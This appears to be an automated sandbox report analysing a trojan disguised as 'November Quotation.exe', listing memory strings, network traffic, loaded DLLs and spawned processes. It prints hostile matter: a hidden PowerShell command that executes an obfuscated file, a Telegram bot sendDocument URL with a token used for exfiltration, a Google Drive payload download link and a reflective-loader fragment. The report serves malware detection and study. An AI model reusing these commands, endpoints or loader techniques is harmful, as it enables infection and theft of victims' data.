          Source: msiexec.exe, 00000005.00000002.2583646535.0000000024112000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.000000002417D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000242EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000241D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
          Source: msiexec.exe, 00000005.00000002.2583646535.000000002417D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000242EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000240CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000241D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
          Source: msiexec.exe, 00000005.00000002.2583646535.0000000024112000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.000000002417D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000242EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000240C3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000240CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000241D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: msiexec.exe, 00000005.00000002.2583646535.0000000024051000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2585049907.0000000026365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: msiexec.exe, 00000005.00000002.2585049907.0000000026365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/1&
          Source: msiexec.exe, 00000005.00000002.2585049907.0000000026365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/8&h5
          Source: powershell.exe, 00000002.00000002.1862036159.000000000734E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
          Source: powershell.exe, 00000002.00000002.1862036159.00000000072F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
          Source: November Quotation.exe, November Quotation.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000002.00000002.1860047618.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000002.00000002.1857229599.0000000004DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: msiexec.exe, 00000005.00000002.2583646535.00000000240E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
          Source: powershell.exe, 00000002.00000002.1857229599.0000000004C71000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.0000000024051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000002.00000002.1857229599.0000000004DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000002.00000002.1857229599.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: msiexec.exe, 00000005.00000002.2583646535.0000000024112000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.000000002417D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000242EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000241D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: msiexec.exe, 00000005.00000002.2583646535.0000000024112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: msiexec.exe, 00000005.00000002.2583646535.00000000241D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283
          Source: msiexec.exe, 00000005.00000003.1949167183.00000000086A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
          Source: powershell.exe, 00000002.00000002.1860047618.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000002.00000002.1860047618.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000002.00000002.1860047618.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: msiexec.exe, 00000005.00000002.2572130777.0000000008689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: msiexec.exe, 00000005.00000002.2582929645.0000000023780000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2572130777.000000000862A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2572130777.0000000008679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XP537jSAqL8SFgV2TDn9D-Q9vzNT4ikj
          Source: msiexec.exe, 00000005.00000002.2572130777.000000000862A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XP537jSAqL8SFgV2TDn9D-Q9vzNT4ikjC
          Source: msiexec.exe, 00000005.00000002.2572130777.000000000869C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: msiexec.exe, 00000005.00000002.2572130777.0000000008689000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1949167183.00000000086A3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2572130777.000000000869C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1XP537jSAqL8SFgV2TDn9D-Q9vzNT4ikj&export=download
          Source: powershell.exe, 00000002.00000002.1857229599.0000000004DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000002.00000002.1860047618.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: msiexec.exe, 00000005.00000002.2583646535.00000000240CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: msiexec.exe, 00000005.00000002.2583646535.00000000240CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: msiexec.exe, 00000005.00000002.2583646535.00000000240CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
          Source: msiexec.exe, 00000005.00000003.1949167183.00000000086A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
          Source: msiexec.exe, 00000005.00000002.2572130777.0000000008689000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1949167183.00000000086A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
          Source: msiexec.exe, 00000005.00000002.2572130777.0000000008689000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1949167183.00000000086A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
          Source: msiexec.exe, 00000005.00000002.2572130777.0000000008689000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1949167183.00000000086A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
          Source: msiexec.exe, 00000005.00000003.1949167183.00000000086A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
          Source: msiexec.exe, 00000005.00000003.1949167183.00000000086A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: msiexec.exe, 00000005.00000003.1949167183.00000000086A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
          Source: msiexec.exe, 00000005.00000003.1949167183.00000000086A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
          Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
          Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
          Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
          Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
          Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
          Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
          Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
          Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
          Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49838 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49848 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49871 version: TLS 1.2
          Source: C:\Users\user\Desktop\November Quotation.exeCode function: 0_2_0040518A GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040518A

          System Summary

          barindex
          Source: initial sampleStatic PE information: Filename: November Quotation.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\sognenes\iconograph\Folkways\November Quotation.exeJump to dropped file
          Source: C:\Users\user\Desktop\November Quotation.exeCode function: 0_2_00403229 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403229
          Source: C:\Users\user\Desktop\November Quotation.exeFile created: C:\Windows\resources\0809Jump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeCode function: 0_2_004065470_2_00406547
          Source: C:\Users\user\Desktop\November Quotation.exeCode function: 0_2_00406D1E0_2_00406D1E
          Source: C:\Users\user\Desktop\November Quotation.exeCode function: 0_2_004049C70_2_004049C7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_029F43285_2_029F4328
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_029F2DD15_2_029F2DD1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_029FEC705_2_029FEC70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_029FEC605_2_029FEC60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_029F8DA05_2_029F8DA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_029F59685_2_029F5968
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_029F5F905_2_029F5F90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_26E633485_2_26E63348
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_26E644C85_2_26E644C8
          Source: November Quotation.exeStatic PE information: invalid certificate
          Source: November Quotation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.evad.winEXE@6/15@6/5
          Source: C:\Users\user\Desktop\November Quotation.exeCode function: 0_2_00404481 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404481
          Source: C:\Users\user\Desktop\November Quotation.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
          Source: C:\Users\user\Desktop\November Quotation.exeFile created: C:\Users\user\AppData\Local\sognenesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
          Source: C:\Users\user\Desktop\November Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nsc467C.tmpJump to behavior
          Source: November Quotation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Users\user\Desktop\November Quotation.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: November Quotation.exeReversingLabs: Detection: 60%
          Source: C:\Users\user\Desktop\November Quotation.exeFile read: C:\Users\user\Desktop\November Quotation.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\November Quotation.exe "C:\Users\user\Desktop\November Quotation.exe"
          Source: C:\Users\user\Desktop\November Quotation.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Mendicity=Get-Content -raw 'C:\Users\user\AppData\Local\sognenes\iconograph\Saddelknapperne.Srv';$Umiskendelighed=$Mendicity.SubString(5275,3);.$Umiskendelighed($Mendicity) "
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
          Source: C:\Users\user\Desktop\November Quotation.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Mendicity=Get-Content -raw 'C:\Users\user\AppData\Local\sognenes\iconograph\Saddelknapperne.Srv';$Umiskendelighed=$Mendicity.SubString(5275,3);.$Umiskendelighed($Mendicity) "Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\November Quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: tem.Core.pdbD source: powershell.exe, 00000002.00000002.1862036159.000000000734E000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000005.00000002.2561413904.0000000005439000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1865707382.000000000A569000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Calcites $Kastepilesedvende $Fldningstiders), (Bragless @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Continually = [AppDomain]::CurrentDomain.GetAssembl
